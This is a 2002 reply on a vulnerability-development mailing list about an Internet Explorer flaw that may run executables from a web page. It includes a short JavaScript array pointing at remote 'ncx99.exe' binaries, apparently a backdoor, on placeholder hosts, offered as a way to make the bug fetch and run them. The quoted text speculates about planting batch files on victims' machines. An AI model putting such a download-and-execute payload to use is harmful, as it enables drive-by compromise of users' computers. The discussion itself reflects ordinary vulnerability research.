Re: Rather large MSIE-hole

Date: Thu, 14 Mar 2002 17:48:27 -0500
From: KF <dotslash@snosoft.com>
To: vuln-dev@security-focus.com

Another thought... will this bug run an executable from a web page? If
so you could just make your own binary to do whatever you wanted. Like
http://mysiteathome.com/malware.exe or something along those lines. I
would HOPE that it asks to save the file to disk or, even better, ignores
it altogether. Maybe try something like:

var programName=new Array(
    'http://mysiteathome.com/ncx99.exe',
    'http://someothersite.com/ncx99.exe',
);

I would do this myself but I don't have any Windows boxen to test.
-KF

Paul D. Campbell wrote:

>>Could you not create a batch file that housed the commands you wanted
>>to run (with args) and just run the batch file?
>>I apologise if someone has already addressed this.
>>
>>-Eric
>>
>
>You would probably be able to do this. However, you would first need
>to place the batch file on the target machine. Then you would have to
>sit around and hope the user visits your malicious site. Though, if
>you have the capability to write to someone's hard drive you could do
>something much nastier than this :)
>
>Paul
>
>


